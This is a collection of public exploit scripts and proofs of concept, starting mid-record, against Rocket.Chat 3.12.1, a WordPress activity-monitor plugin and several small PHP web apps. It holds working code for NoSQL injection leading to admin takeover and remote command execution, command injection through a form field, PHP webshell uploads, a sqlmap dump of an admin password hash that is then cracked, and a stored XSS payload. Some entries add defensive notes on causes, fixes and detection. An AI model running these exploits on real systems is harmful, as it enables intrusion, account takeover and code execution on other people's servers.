------WebKitFormBoundary4Dm8cGBqGNansHqI Content-Disposition: form-data; name="IDUser" 6 ------WebKitFormBoundary4Dm8cGBqGNansHqI Content-Disposition: form-data; name="Image"; filename="rev.php" Content-Type: application/octet-stream <?php echo "output: ";system($_GET['rev']); ?> ------WebKitFormBoundary4Dm8cGBqGNansHqI-- ########### # Access: # ########### # Webshell access via: PoC 1: http://localhost/osms/assets/img/Product_Uploaded/rev.php?rev=whoami PoC 2: http://localhost/osms/assets/img/Profile_Uploaded/rev.php?rev=whoami # Output: result: windows10\user
  21. # Title: Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) (2) # Author: enox # Date: 06-06-2021 # Product: Rocket.Chat # Vendor: https://rocket.chat/ # Vulnerable Version(s): Rocket.Chat 3.12.1 (2) # CVE: CVE-2021-22911 # Credits: https://blog.sonarsource.com/nosql-injections-in-rocket-chat # Info : This is a faster exploit that utilizes the authenticated nosql injection to retrieve the reset token for administrator instead of performing blind nosql injection. #!/usr/bin/python import requests import string import time import hashlib import json import oathtool import argparse parser = argparse.ArgumentParser(description='RocketChat 3.12.1 RCE') parser.add_argument('-u', help='Low priv user email [ No 2fa ]', required=True) parser.add_argument('-a', help='Administrator email', required=True) parser.add_argument('-t', help='URL (Eg: http://rocketchat.local)', required=True) args = parser.parse_args() adminmail = args.a lowprivmail = args.u target = args.t def forgotpassword(email,url): payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"sendForgotPasswordEmail\\",\\"params\\":[\\"'+email+'\\"]}"}' headers={'content-type': 'application/json'} r = requests.post(url+"/api/v1/method.callAnon/sendForgotPasswordEmail", data = payload, headers = headers, verify = False, allow_redirects = False) print("[+] Password Reset Email Sent") def resettoken(url): u = url+"/api/v1/method.callAnon/getPasswordPolicy" headers={'content-type': 'application/json'} token = "" num = list(range(0,10)) string_ints = [str(int) for int in num] characters = list(string.ascii_uppercase + string.ascii_lowercase) + list('-')+list('_') + string_ints while len(token)!= 43: for c in characters: payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"getPasswordPolicy\\",\\"params\\":[{\\"token\\":{\\"$regex\\":\\"^%s\\"}}]}"}' % (token + c) r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False) time.sleep(0.5) if 'Meteor.Error' 
not in r.text: token += c print(f"Got: {token}") print(f"[+] Got token : {token}") return token def changingpassword(url,token): payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\"]}"}' headers={'content-type': 'application/json'} r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False) if "error" in r.text: exit("[-] Wrong token") print("[+] Password was changed !") def twofactor(url,email): # Authenticating sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}' headers={'content-type': 'application/json'} r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) if "error" in r.text: exit("[-] Couldn't authenticate") data = json.loads(r.text) data =(data['message']) userid = data[32:49] token = data[60:103] print(f"[+] Succesfully authenticated as {email}") # Getting 2fa code cookies = {'rc_uid': userid,'rc_token': token} headers={'X-User-Id': userid,'X-Auth-Token': token} payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{+throw+this.services.totp.secret+})()"}' r = requests.get(url+payload,cookies=cookies,headers=headers) code = r.text[46:98] print(f"Got the code for 2fa: {code}") return code def admin_token(url,email): # Authenticating sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}' headers={'content-type': 'application/json'} r = requests.post(url + 
"/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) if "error" in r.text: exit("[-] Couldn't authenticate") data = json.loads(r.text) data =(data['message']) userid = data[32:49] token = data[60:103] print(f"[+] Succesfully authenticated as {email}") # Getting reset token for admin cookies = {'rc_uid': userid,'rc_token': token} headers={'X-User-Id': userid,'X-Auth-Token': token} payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{+throw+this.services.password.reset.token+})()"}' r = requests.get(url+payload,cookies=cookies,headers=headers) code = r.text[46:89] print(f"Got the reset token: {code}") return code def changingadminpassword(url,token,code): payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\",{\\"twoFactorCode\\":\\"'+code+'\\",\\"twoFactorMethod\\":\\"totp\\"}]}"}' headers={'content-type': 'application/json'} r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False) if "403" in r.text: exit("[-] Wrong token") print("[+] Admin password changed !") def rce(url,code,cmd): # Authenticating sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() headers={'content-type': 'application/json'} payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"totp\\":{\\"login\\":{\\"user\\":{\\"username\\":\\"admin\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}},\\"code\\":\\"'+code+'\\"}}]}"}' r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) if "error" in r.text: exit("[-] Couldn't authenticate") data = json.loads(r.text) data =(data['message']) userid = data[32:49] token = data[60:103] print("[+] Succesfully authenticated as administrator") # Creating Integration payload = 
'{"enabled":true,"channel":"#general","username":"admin","name":"rce","alias":"","avatarUrl":"","emoji":"","scriptEnabled":true,"script":"const require = console.log.constructor(\'return process.mainModule.require\')();\\nconst { exec } = require(\'child_process\');\\nexec(\''+cmd+'\');","type":"webhook-incoming"}' cookies = {'rc_uid': userid,'rc_token': token} headers = {'X-User-Id': userid,'X-Auth-Token': token} r = requests.post(url+'/api/v1/integrations.create',cookies=cookies,headers=headers,data=payload) data = r.text data = data.split(',') token = data[12] token = token[9:57] _id = data[18] _id = _id[7:24] # Triggering RCE u = url + '/hooks/' + _id + '/' +token r = requests.get(u) print(r.text) ############################################################ # Getting Low Priv user print(f"[+] Resetting {lowprivmail} password") ## Sending Reset Mail forgotpassword(lowprivmail,target) ## Getting reset token through blind nosql injection token = resettoken(target) ## Changing Password changingpassword(target,token) # Privilege Escalation to admin ## Getting secret for 2fa secret = twofactor(target,lowprivmail) ## Sending Reset mail print(f"[+] Resetting {adminmail} password") forgotpassword(adminmail,target) ## Getting admin reset token through nosql injection authenticated token = admin_token(target,lowprivmail) ## Resetting Password code = oathtool.generate_otp(secret) changingadminpassword(target,token,code) ## Authenticating and triggering rce while True: cmd = input("CMD:> ") code = oathtool.generate_otp(secret) rce(target,code,cmd)
  # Exploit Title: WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)
# Date: 07.07.2021
# Exploit Author: Beren Kuday GORUN
# Vendor Homepage: https://wordpress.org/plugins/plainview-activity-monitor/
# Software Link: https://www.exploit-db.com/apps/2e1f384e5e49ab1d5fbf9eedf64c9a15-plainview-activity-monitor.20161228.zip
# Version: 20161228 and possibly prior
# Fixed version: 20180826
# CVE : CVE-2018-15877
#
# Reviewer notes (defensive context):
# - Vulnerable sink: the plugin's "activity tools" page hands the submitted 'ip'
#   value to a server-side dig lookup (the response echoes "Output from dig:");
#   a shell pipe in that value is enough to run further commands as the web
#   server user. Patched in 20180826 -- updating the plugin is the fix.
# - Precondition: valid WordPress credentials for an account that can reach
#   wp-admin/admin.php?page=plainview_activity_monitor (hence "Authenticated").
# - Detection: POST requests to admin.php?page=plainview_activity_monitor&tab=activity_tools
#   whose 'ip' field carries shell metacharacters (e.g. '|') instead of a host name.

"""
-------------------------
Usage:
┌──(root@kali)-[~/tools]
└─# python3 WordPress-Activity-Monitor-RCE.py
What's your target IP?
192.168.101.28
What's your username?
mark
What's your password?
password123
[*] Please wait...
[*] Perfect!
www-data@192.168.101.28 whoami
www-data
www-data@192.168.101.28 pwd
/var/www/html/wp-admin
www-data@192.168.101.28 id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
"""

import requests
from bs4 import BeautifulSoup


def exploit(whoami, ip):
    """Interactive loop: read a command, send it through the 'ip' field, print the result.

    Args:
        whoami: text shown in the prompt (the output of poc()'s initial probe).
        ip: target host; all requests go over plain http.
    Never returns normally -- loops until the process is interrupted.
    """
    while 1:
        cmd = input(whoami+"@"+ip+" ")
        url = 'http://' + ip + '/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools'
        # A valid host name first so the plugin's dig call still succeeds; the
        # pipe makes the command's output land in the same HTML response.
        payload = "google.com.tr | " + cmd
        data = {'ip': payload , 'lookup' : 'lookup' }
        # getCookie() performs a fresh login for every command (no session reuse).
        x = requests.post(url, data = data, cookies=getCookie(ip))
        # split()[1] raises IndexError when the marker is missing -- e.g. login
        # failed, the plugin is absent, or a patched version no longer echoes it.
        html_doc = x.text.split("<p>Output from dig: </p>")[1]
        soup = BeautifulSoup(html_doc, 'html.parser')
        # Only the first <p> after the marker is printed.
        print(soup.p.text)


def poc(ip):
    """One-shot probe: inject `whoami`, report success, then hand off to exploit().

    Args:
        ip: target host.
    Raises IndexError (via the split below) if the response lacks the dig marker.
    """
    url = 'http://' + ip + '/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools'
    myobj = {'ip': 'google.fr | whoami', 'lookup' : 'lookup' }
    x = requests.post(url, data = myobj, cookies=getCookie(ip))
    html_doc = x.text.split("<p>Output from dig: </p>")[1]
    soup = BeautifulSoup(html_doc, 'html.parser')
    print("[*] Perfect! \n")
    # The probe's output (the web server's user name) becomes the prompt prefix.
    exploit(soup.p.text, ip)


def getCookie(ip):
    """Log in to wp-login.php and return the WordPress auth cookies as a dict.

    Reads the module-level `username` and `password` assigned at the bottom of
    the script; calling it before those lines run raises NameError.

    Args:
        ip: target host.
    Returns:
        dict mapping cookie name -> value for every Set-Cookie entry whose
        name contains "wordpress". Raises KeyError if no Set-Cookie header
        is present.
    """
    url = 'http://' + ip + '/wp-login.php'
    #log=admin&pwd=admin&wp-submit=Log+In&redirect_to=http%3A%2F%2Fwordy%2Fwp-admin%2F&testcookie=1
    data = {'log':username, 'pwd':password, 'wp-submit':'Log In', 'testcookie':'1'}
    x = requests.post(url, data = data)
    cookies = {}
    # requests folds multiple Set-Cookie headers into one string; it is split
    # on whitespace rather than parsed, so only simple "name=value;" tokens work.
    cookie = str(x.headers["Set-Cookie"])
    for i in cookie.split():
        if(i.find("wordpress") != -1 and i.find("=") != -1):
            # Drops the last character of the value -- presumably the trailing
            # ';' separator; a value without one would lose a real character.
            cookies[i.split("=")[0]] = i.split("=")[1][:len(i.split("=")[1])-1]
    return cookies


# Script entry: prompt for the target and credentials, then run the probe.
ip = input("What's your target IP?\n")
username = input("What's your username?\n")
password = input("What's your password?\n")
print("[*] Please wait...")
poc(ip)
# Exploit Title: Online Covid Vaccination Scheduler System 1.0 - 'username' time-based blind SQL Injection
# Date: 2021-07-07
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scheduler.zip
# Version: 1.0
# Tested on: Windows 10, XAMPP

################
# Description #
################

The admin panel login can be accessed at http://{ip}/scheduler/admin/login.php. The username parameter is vulnerable to time-based blind SQL injection. After dumping the admin password hash, we can crack it and obtain the plain-text password, and hence authenticate as Administrator.

###########
# PoC #
###########

Run sqlmap to dump username and password:

$ sqlmap -u "http://localhost/scheduler/classes/Login.php?f=login" --data="username=admin&password=blabla" --cookie="PHPSESSID=n3to3djqetf42c2e7l257kspi5" --batch --answers="crack=N,dict=N,continue=Y,quit=N" -D scheduler -T users -C username,password --dump

###########
# Output #
###########

Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 7551 FROM (SELECT(SLEEP(5)))QOUn) AND 'MOUZ'='MOUZ&password=blabla
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

web server operating system: Windows
web application technology: PHP 5.6.24, Apache 2.4.23
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
current database: 'scheduler'
Database: scheduler
Table: users
[1 entry]
+----------+----------------------------------+
| username | password                         |
+----------+----------------------------------+
| admin    | 0192023a7bbd73250516f069df18b500 |
+----------+----------------------------------+

The password hash is produced by PHP's md5() function, so an MD5 reverse lookup for 0192023a7bbd73250516f069df18b500 yields admin123.
  # Exploit Title: Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthenticated)
# Exploit Author: Davide 'yth1n' Bianchin
# Contacts: davide dot bianchin at dedagroup dot it
# Original PoC: https://exploit-db.com/exploits/50103
# Date: 06.07.2021
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14205/exam-hall-management-system-full-source-code-using-phpmysql.html
# Version: 1.0
# Tested on: Kali Linux
#
# Reviewer notes (defensive context):
# - Root cause: pages/save_user.php stores whatever arrives in the multipart 'image'
#   part under uploadImage/Profile/ with the client-chosen file name, and accepts the
#   request without any session cookie. A .php name inside the web root is then
#   executed by the server on the next GET.
# - Mitigation: require authentication on the upload handler, allow-list extensions
#   and verify the image content server-side (never trust the client-supplied
#   Content-Type), generate the stored name server-side, and keep uploads outside
#   the web root or in a directory with PHP execution disabled.
# - Detection: a multipart POST to pages/save_user.php whose 'image' part carries a
#   .php file name, followed by GETs to uploadImage/Profile/<name>.php?cmd=... .

import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
import os
import sys
import string
import random
import time

# Target placeholders -- edit before use.
host = 'localhost' #CHANGETHIS
path = 'SourceCode' #CHANGETHIS
# Upload endpoint of the application.
url = 'http://'+host+'/'+path+'/pages/save_user.php'


def id_generator(size=6, chars=string.ascii_lowercase):
    """Return a random lowercase name of `size` characters with a '.php' suffix.

    The name only needs to avoid colliding with an existing upload, so the
    non-cryptographic `random` module is adequate here.
    """
    return ''.join(random.choice(chars) for _ in range(size))+'.php'


# Usage banner; the script takes exactly one positional argument.
if len(sys.argv) == 1:
    print("#########")
    print("Usage: python3 examhallrce.py command")
    print("Usage: Use the char + to concatenate commands")
    print("Example: python3 examhallrce.py whoami")
    print("Example: python3 examhallrce.py ls+-la")
    print("#########")
    exit()

# Module-level name of the file to upload; read by reverse() below.
filename = id_generator()
print("Generated "+filename+ " file..")
time.sleep(2)
print("Uploading file..")
time.sleep(2)


def reverse():
    """Upload a one-line PHP file that runs the 'cmd' query parameter, then fetch it once.

    Despite the name this does not open a reverse shell: it performs a single
    HTTP round trip per invocation. Reads the globals `filename`, `host`,
    `path` and `url`, and sys.argv[1] as the command to run.
    Returns None; all results are printed via curl's stdout.
    """
    command = sys.argv[1]
    # Client-declared Content-Type is 'application/octet-stream' although the
    # name ends in .php -- a server that validates only this header is bypassed.
    multipart_data = MultipartEncoder({
        'image': (filename, '<?php system($_GET["cmd"]); ?>', 'application/octet-stream'),
        'btn_save': ''
    })
    # The response is never inspected, so the "Success" line below is printed
    # regardless of whether the server actually stored the file.
    r = requests.post(url, data=multipart_data, headers={'Content-Type':multipart_data.content_type})
    endpoint = 'http://'+host+'/'+path+'/uploadImage/Profile/'+filename+''
    # `command` is inserted into the query string unencoded; the usage text's
    # '+' separator presumably decodes to a space server-side. Characters with
    # URL or shell meaning will not survive this and the os.system call intact.
    urlo = 'http://'+host+'/'+path+'/uploadImage/Profile/'+filename+'?cmd='+command+''
    print("Success, file correctly uploaded at: " +endpoint+ "")
    time.sleep(1)
    print("Executing command in 1 seconds:\n")
    time.sleep(1)
    # Shells out to curl with the URL pasted unquoted into the command string.
    os.system("curl -X GET "+urlo+"")


reverse()
# Exploit Title: Employee Record Management System 1.2 - Stored Cross-Site Scripting (XSS)
# Date: 07 July 2021
# Exploit Author: Subhadip Nag (mrl0s3r)
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/employee-record-management-system-in-php-and-mysql/
# Tested on: Server: XAMPP

# Description
# Employee Record Management System 1.2 is vulnerable to stored cross-site scripting (XSS) in the "Edit My Education" page because user-supplied data is not sufficiently sanitized.

# Proof of Concept (PoC): Exploit
#
1) Go to: http://localhost/ERMSP/erms/loginerms.php
2) Log in as a user (with the given username and password)
3) Go to "Edit My Education" and "Edit My Exp"
4) Enter the payload: <script>alert(1)</script>
5) Click Update
6) Open the "My Education" option
7) The payload executes, confirming the stored XSS

# PoC images
1) https://ibb.co/LS78xjX
2) https://ibb.co/9G0Pbxb